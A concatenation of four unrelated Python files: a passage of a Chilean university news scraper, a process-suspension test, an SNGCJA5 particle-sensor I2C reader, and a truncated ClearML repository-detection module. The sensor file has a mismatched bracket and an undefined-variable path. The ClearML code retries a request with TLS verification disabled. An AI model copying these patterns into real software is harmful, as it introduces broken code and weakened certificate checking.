'vinculacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_38_39__1.html',
'acreditacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_83_113__1.html',
'casa-central': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_15__1.html',
'sede-victoria': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_17__1.html',
'noticias-arica': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_12__1.html',
'noticias-antofagasta': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_14__1.html',
'noticias-santiago': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_16__1.html'
}
for cat, url in urls_news.items():
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "taxport-item"})
items = list(set(items)) # Elimina elementos duplicados
for item in items:
try:
link = url_base + item.find("div", {"class": "titular"}).a['href'].strip()
titulo = item.find("div", {"class": "titular"}).a.text.strip()
fecha = item.find("div", {"class": "fecha"}).text.strip()
fecha = formatear_fecha(fecha, 'unap')
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
try:
bajada = bs_noticia.find(id='content').find('h2', {'class': 'bajada'}).text.strip()
except Exception:
bajada = bs_noticia.find("div", {"class": "CUERPO"}).find_all('p')
for b in bajada:
b = b.text.strip()
if b: # Si la bajada no está vacia devuelvela y termina de buscar
bajada = b
break
try:
imagen = url_base + bs_noticia.find("div", {"class": "CUERPO"}).find("img")['src'].strip()
except Exception:
imagen = ''
categoria_busqueda = setCategoria(cat)
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Antofagasta
def ua():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UA')
url_rss = "http://www.comunicacionesua.cl/feed/"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
bajada = item['description']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ua")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'qode-post-image'}).img['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Atacama
def uda():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UDA')
url_rss = "http://www.uda.cl/index.php?option=com_content&view=category&layout=blog&id=15&Itemid=253&format=feed&type=atom"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uda")
categoria_busqueda = setCategoria(item['category'])
imagen = "http://www.uda.cl/" + BeautifulSoup(item['summary'], "html.parser").find('img')['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de La Serena
# Región de Coquimbo
def userena():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='USERENA')
url_rss = ['http://www.userena.cl/actualidad-uls.feed?type=rss',
'http://www.userena.cl/cultura-y-extension.feed?type=rss',
'http://www.userena.cl/dgae.feed?type=rss']
feeds = []
for url in url_rss:
feeds.append(feedparser.parse( url ))
for feed in feeds:
for item in feed['items']:
try:
titulo = item['title']
bajada = BeautifulSoup(item['summary'], "html.parser").find_all('p')[2].text
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "userena")
categoria_busqueda = setCategoria(item['category'])
imagen = BeautifulSoup(item['summary'], "html.parser").p.img['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de O'Higgins
def uoh():
# https://www.uoh.cl/
# https://www.uoh.cl/#noticias-y-eventos
logging.debug('Lanzado')
# universidad = Universidad.objects.get(alias='UOH')
# contents = urllib.request.urlopen("https://www.uoh.cl/#noticias-y-eventos").read()
logging.debug('Deteniendo')
# Universidad Católica del Maule
def ucm():
# http://portal.ucm.cl/
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCM')
url_rss = "https://portal.ucm.cl/feed" # URL de feed RSS
feed = feedparser.parse( url_rss ) # Se obtiene el XML y se procesa
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ucm")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-image'}).img['src']
bajada = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-paragraph'}).find_all('p')[1].text
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de la Frontera
def ufro():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UFRO')
url_rss = 'https://www.ufro.cl/index.php/noticias/12-destacadas?format=feed&type=rss'
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ufro")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = 'https://www.ufro.cl' + BeautifulSoup(noticia, "html.parser").find('td', {'id': 'imagen'}).p.img['src']
bajada = BeautifulSoup(noticia, "html.parser").find('p', {'class': 'bajada'}).text.strip()
if not bajada:
bajada = BeautifulSoup(noticia, "html.parser").find('table', {'class': 'tnoticia'}).tbody.tr.find_all('td')[1].p.text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.ufro.cl/
# Universidad Católica de Temuco
def uct():
# Esta página carga con Angular, se debe usar selenium
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCT')
url_base = 'https://www.uct.cl/actualidad/?typing=noticias'
# contents = urllib.request.urlopen(url_base).read()
# bs = BeautifulSoup(contents, "html.parser")
# items = bs.find_all("div", {"class": "cardwdetail"})
# print('------------------')
# print( items )
# print('------------------')
logging.debug('Deteniendo')
# https://www.uct.cl/
pass
# Universidad Austral de Chile
def uach():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UACH')
url = ''
logging.debug('Deteniendo')
# https://www.uach.cl/
pass
# Universidad de Aysén
def uaysen():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UAYSEN')
url = ''
logging.debug('Deteniendo')
# https://uaysen.cl/
pass
# Universidad de Magallanes
def umag():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UMAG')
url = 'http://www.umag.cl/vcm/?page_id=459'
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "not-col11"})
for item in items:
try:
link = item.find('a', {'class': 'link'})['href']
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
titulo = bs_noticia.find('div', {'class': 'post-title'}).h2.a.text.strip()
fecha = bs_noticia.find('span', {'class': 'post-dates'}).text.strip()
fecha = formatear_fecha(fecha, "umag")
categoria_busqueda = setCategoria('')
try:
imagen = bs_noticia.find('div', {'class': 'entry'}).find('a').find('img')['src']
except:
imagen = ''
bajada = bs_noticia.find('div', {'class': 'entry'}).p.text.strip()
if not bajada:
bajada = bs_noticia.find('div', {'class': 'entry'}).find_all('p')[2].text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# http://www.umag.cl/
# Universidad de Tarapacá
def uta():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTA')
url_rss = 'https://www.uta.cl/index.php/feed/'
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uta")
try:
categoria_busqueda = setCategoria(item['category'])
except:
categoria_busqueda = setCategoria()
bajada = item['summary'].strip()
noticia = urllib.request.urlopen(link).read()
try:
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'wp-block-image'}).figure.a.img['src']
except:
try:
imagen = BeautifulSoup(noticia, "html.parser").find('figure', {'class': 'wp-block-image'}).a.img['src']
except:
imagen = ''
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.uta.cl/
|
multiprocessing.py | """Test for suspending and resuming a process."""
import multiprocessing as mp
import time
import psutil
from bsl.triggers import ParallelPortTrigger
from cardio_audio_sleep.config import load_triggers
from cardio_audio_sleep.tasks import isochronous
from cardio_audio_sleep.utils import generate_sequence, search_ANT_amplifier
if __name__ == "__main__":
trigger = ParallelPortTrigger("/dev/parport0")
tdef = load_triggers()
stream_name = search_ANT_amplifier()
ecg_ch_name = "AUX7"
sequence = generate_sequence(20, 0, 10, tdef)
delay = 0.5
process = mp.Process(
target=isochronous, args=(trigger, tdef, sequence, delay)
)
process.start()
psutil_process = psutil.Process(process.pid)
time.sleep(5)
psutil_process.suspend()
time.sleep(2)
psutil_process.resume()
process.join()
|
sngcja5_thread.py | import sys
import logging
import threading
import smbus
from time import sleep
from queue import Queue
from datetime import datetime
MASS_DENSITY_PM_TYPES = ["pm1.0", "pm2.5", "pm10"]
MASS_DENSITY_BLOCK_SIZE = 4
ADDRESS_MASS_DENSITY_HEAD = 0
ADDRESS_MASS_DENSITY_TAIL = 11
ADDRESS_MASS_DENSITY_LENGTH = (ADDRESS_MASS_DENSITY_TAIL - ADDRESS_MASS_DENSITY_HEAD) + 1
'''
Address register of mass density values is started from 0 (0x00) to 11 (0x0B).
Size of each value block is 4 bytes (32 bits)
Total data length is 12 bytes
Value allocation
------------------------
PM1.0: byte 0 - byte 3
PM2.5: byte 4 - byte 7
PM10: byte 8 - byte 11
'''
PARTICLE_COUNT_PM_TYPES = ["pm0.5", "pm1.0", "pm2.5", "N/A", "pm5.0", "pm7.5", "pm10"]
PARTICLE_COUNT_BLOCK_SIZE = 2
ADDRESS_PARTICLE_COUNT_HEAD = 12
ADDRESS_PARTICLE_COUNT_TAIL = 25
ADDRESS_PARTICLE_COUNT_LENGTH = (ADDRESS_PARTICLE_COUNT_TAIL - ADDRESS_PARTICLE_COUNT_HEAD) + 1
'''
Address register of particle count values is started from 12 (0x0C) to 25 (0x19)
Size of each value block is 2 bytes (16 bits)
Total data length is 14 bytes (or 12 bytes excluding byte 18 and 19)
Value allocation
------------------------
PM0.5: byte 12 - byte 13
PM1.0: byte 14 - byte 15
PM2.5: byte 16 - byte 17
N/A: byte 18 - byte 19
PM5.0: byte 20 - byte 21
PM7.5: byte 22 - byte 23
PM10: byte 24 - byte 25
'''
STATUS_MASTER = "Sensor status"
STATUS_BIT_MASK = 0b11
STATUS_BYTE_FIELDS={"Sensor status":6,"PD Status":4,"LD Status":2,"Fan status":0]
ADDRESS_STATUS_BYTE = 0x26
# Total raw data length stored in sensor register, i.e. 26 bytes
DATA_LENGTH_HEAD = ADDRESS_MASS_DENSITY_HEAD
DATA_LENGTH_TAIL = ADDRESS_PARTICLE_COUNT_TAIL
TOTAL_DATA_LENGTH = ADDRESS_MASS_DENSITY_LENGTH + ADDRESS_PARTICLE_COUNT_LENGTH
class SNGCJA5_thread:
def __init__(self, i2c_bus_no:int, logger:str=None):
self.logger = None
if logger:
self.logger = logging.getLogger(logger)
self.i2c_address = 0x33
try:
self.i2c_bus = smbus.SMBus(i2c_bus_no)
except OSError as e:
print("OSError")
print(e)
self.__mass_density_addresses = {pm_type: MASS_DENSITY_BLOCK_SIZE*order
for order, pm_type in enumerate(MASS_DENSITY_PM_TYPES)}
self.__particle_count_addresses = {pm_type: PARTICLE_COUNT_BLOCK_SIZE*order
for order, pm_type in enumerate(PARTICLE_COUNT_PM_TYPES)}
self.__current_status = {STATUS_MASTER:0}
self.__data = Queue(maxsize=20)
self.__run()
def get_mass_density_data(self, data:list) -> dict:
return {pm_type:
float((data[address+3] << 24 |
data[address+2] << 16 |
data[address+1] << 8 |
data[address]) / 1000)
for pm_type, address in self.__mass_density_addresses.items()}
def get_particle_count_data(self, data:list) -> dict:
return {pm_type:
float((data[address+1] << 8 | data[address]))
for pm_type, address in self.__particle_count_addresses.items()
if pm_type != "N/A"}
def __read_sensor_data(self) -> None:
while True:
try:
status = self.i2c_bus.read_i2c_block_data(self.i2c_address,ADDRESS_STATUS_BYTE,1)
self.__current_status = {stat_name:(status[0] & (STATUS_BIT_MASK << STATUS_BYTE_FIELDS[stat_name])) >> STATUS_BYTE_FIELDS[stat_name] for stat_name in STATUS_BYTE_FIELDS}
if (self.__current_status[STATUS_MASTER] == 0):
data = self.i2c_bus.read_i2c_block_data(self.i2c_address, DATA_LENGTH_HEAD, TOTAL_DATA_LENGTH)
else:
if self.logger:
self.logger.warning(f"Sensor status not OK - status values {self.__current_status}")
mass_density_data = self.get_mass_density_data(data[ADDRESS_MASS_DENSITY_HEAD:ADDRESS_MASS_DENSITY_TAIL+1])
particle_count_data = self.get_particle_count_data(data[ADDRESS_PARTICLE_COUNT_HEAD:ADDRESS_PARTICLE_COUNT_TAIL+1])
if self.__data.full():
self.__data.get()
self.__data.put({
"sensor_data": {
"mass_density": mass_density_data,
"particle_count": particle_count_data,
"mass_density_unit": "ug/m3",
"particle_count_unit": "none"
},
"timestamp": int(datetime.now().timestamp())
})
except KeyboardInterrupt:
sys.exit()
except OSError as e:
if self.logger:
self.logger.warning(f"{type(e).__name__}: {e}")
self.logger.warning("Sensor is not detected on I2C bus. Terminating...")
else:
print(f"{type(e).__name__}: {e}")
print("Sensor is not detected on I2C bus. Terminating...")
sys.exit(1)
except Exception as e:
if self.logger:
self.logger.warning(f"{type(e).__name__}: {e}")
else:
print(f"{type(e).__name__}: {e}")
finally:
# Data is updated by sensor every 1 second as per specification.
# 1-second delay is added to compensate data duplication
sleep(1)
def get_measurement(self) -> dict:
if self.__data.empty():
return {}
return self.__data.get()
def __run(self):
threading.Thread(target=self.__read_sensor_data, daemon=True).start()
|
scriptinfo.py | import os
import sys
from tempfile import mkstemp
import attr
import collections
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None):
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = get_installed_pkgs_detail()
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
import torch.utils.tensorboard
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except:
conda_requirements = ''
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, v.version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
requirements_txt += '{0}\n'.format(k)
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
return requirements_txt, conda_requirements
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
@classmethod
def observer(cls, jupyter_notebook_filename):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from trains import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except:
our_module = None
try:
import re
replace_ipython_pattern = re.compile('\\n([ \\t]*)get_ipython\(\)')
except:
replace_ipython_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
# noinspection PyBroadException
try:
get_ipython().run_line_magic('notebook', local_jupyter_filename)
except Exception as ex:
continue
# get notebook python script
script_code, resources = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code)
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub('\n# \g<1>get_ipython()', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
fmodules, _ = file_import_modules(notebook.parts[-1], script_code)
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
task._update_script(script=data_script)
# update requirements
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep+'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except:
server_info = None
if server_info:
break
try:
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
r.raise_for_status()
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = notebook_name
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even oon windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _get_working_dir(cls, repo_root):
repo_root = Path(repo_root).absolute()
try:
return Path.cwd().relative_to(repo_root).as_posix()
except ValueError:
# Working directory not under repository root
return os.path.curdir
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepath, check_uncommitted=True, create_requirements=True, log=None):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
script_path = Path(os.path.normpath(jupyter_filepath)).absolute()
else:
script_path = Path(os.path.normpath(filepath)).absolute()
if not script_path.is_file():
raise ScriptInfoError(
"Script file [{}] could not be found".format(filepath)
)
script_dir = script_path.parent
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
if not plugin:
log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(str(script_dir), include_diff=check_uncommitted)
except Exception as ex:
_log("no info for {} ({})", script_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", script_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
)
messages = []
if repo_info.modified:
messages.append(
"======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
script_info.get("repository", "")
)
)
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages),
script_requirements)
@classmethod
def get(cls, filepath=sys.argv[0], check_uncommitted=True, create_requirements=True, log=None):
try:
return cls._get_script_info(
